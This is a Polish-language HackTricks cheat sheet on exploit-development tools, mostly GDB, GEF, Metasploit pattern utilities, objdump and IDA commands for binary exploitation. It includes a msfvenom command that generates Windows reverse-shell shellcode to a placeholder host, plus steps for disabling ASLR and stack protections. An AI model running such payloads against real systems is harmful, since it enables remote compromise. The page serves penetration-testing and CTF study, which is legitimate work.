Exploiting Tools

Zacznij od zera i stań się ekspertem od hakowania AWS dzięki htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Metasploit

pattern_create.rb -l 3000  #Length
pattern_offset.rb -l 3000 -q 5f97d534  #Search offset
nasm_shell.rb
nasm> jmp esp  #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01

Shellkody

msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c

GDB

Instalacja

apt-get install gdb

Parametry

-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process

Instrukcje

run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit

# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process

# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes

# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate

# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP

Opcjonalnie możesz użyć tej wersji GEF, która zawiera bardziej interesujące instrukcje.

help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table

# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap

#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp

#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61

#Dump memory to file
dump binary memory /tmp/dump.bin 0x200000000 0x20000c350

#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely

Sztuczki

Takie same adresy w GDB

Podczas debugowania GDB będzie miał nieco inne adresy niż te używane przez binarny plik podczas wykonywania. Możesz sprawić, że GDB będzie miał takie same adresy, wykonując następujące kroki:

 • unset env LINES

 • unset env COLUMNS

 • set env _=<ścieżka> Wstaw bezwzględną ścieżkę do pliku binarnego

 • Wykorzystaj błąd binarny, korzystając z tej samej bezwzględnej ścieżki

 • PWD i OLDPWD muszą być takie same podczas korzystania z GDB i wykorzystywania błędu binarnego

Backtrace do znalezienia wywołanych funkcji

Gdy masz binarny plik z linkowaniem statycznym, wszystkie funkcje będą należeć do binarnego pliku (a nie do zewnętrznych bibliotek). W tym przypadku będzie trudno zidentyfikować przepływ, którym podąża binarny plik, aby na przykład poprosić o dane wejściowe. Możesz łatwo zidentyfikować ten przepływ, uruchamiając binarny plik z gdb, aż zostaniesz poproszony o dane wejściowe. Następnie zatrzymaj go za pomocą CTRL+C i użyj polecenia bt (backtrace) aby zobaczyć wywołane funkcje:

gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()

Serwer GDB

gdbserver --multi 0.0.0.0:23947 (w IDA musisz podać pełną ścieżkę do pliku wykonywalnego na maszynie z systemem Linux i na maszynie z systemem Windows)

Ghidra

Znajdowanie przesunięcia stosu

Ghidra jest bardzo przydatne do znalezienia przesunięcia dla przepełnienia bufora dzięki informacjom o położeniu zmiennych lokalnych. Na przykład, w poniższym przykładzie, przepełnienie bufora w local_bc wskazuje, że potrzebujesz przesunięcia 0xbc. Ponadto, jeśli local_10 jest ciasteczkiem kanarkowym, wskazuje to, że aby je nadpisać z local_bc, istnieje przesunięcie 0xac. Pamiętaj, że pierwsze 0x08, gdzie zapisywany jest RIP, należy do RBP.

qtool

qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog

Zdobądź każdy opcode wykonany w programie.

GCC

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Kompiluj bez zabezpieczeń -o --> Wyjście -g --> Zapisz kod (GDB będzie w stanie go zobaczyć) echo 0 > /proc/sys/kernel/randomize_va_space --> Aby wyłączyć ASLR w systemie Linux

Aby skompilować shellcode: nasm -f elf assembly.asm --> zwraca ".o" ld assembly.o -o shellcodeout --> Wykonywalny

Objdump

-d --> Rozkładaj na części sekcje wykonywalne (zobacz kody operacyjne skompilowanego shellcode, znajdź ROP Gadgets, znajdź adres funkcji...) -Mintel --> Składnia Intel -t --> Tabela Symboli -D --> Rozkładaj wszystko (adres zmiennej statycznej) -s -j .dtors --> sekcja dtors -s -j .got --> sekcja got -D -s -j .plt --> sekcja plt zdekompilowana -TR --> Relokacje ojdump -t --dynamic-relo ./exec | grep puts --> Adres "puts" do modyfikacji w GOT objdump -D ./exec | grep "VAR_NAME" --> Adres lub zmienna statyczna (przechowywane w sekcji DATA).

Core dumps

 1. Uruchom ulimit -c unlimited przed uruchomieniem mojego programu

 2. Uruchom sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t

 3. sudo gdb --core=<path/core> --quiet

More

ldd executable | grep libc.so.6 --> Adres (jeśli ASLR, to zmienia się za każdym razem) for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Pętla do sprawdzenia, czy adres zmienia się dużo readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Przesunięcie "system" strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Przesunięcie "/bin/sh"

strace executable --> Funkcje wywołane przez wykonywalny rabin2 -i ejecutable --> Adres wszystkich funkcji

Inmunity debugger

!mona modules  #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll  #Search for opcodes insie dll space (JMP ESP)

IDA

Debugowanie w zdalnym systemie Linux

Wewnątrz folderu IDA znajdziesz pliki binarne, które można użyć do debugowania binarnego pliku w systemie Linux. Aby to zrobić, przenieś plik linux_server lub linux_server64 do serwera Linux i uruchom go wewnątrz folderu, który zawiera dany plik binarny:

./linux_server64 -Ppass

Następnie skonfiguruj debugger: Debugger (linux remote) --> Opcje procesu...:

Zdobądź wiedzę na temat hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated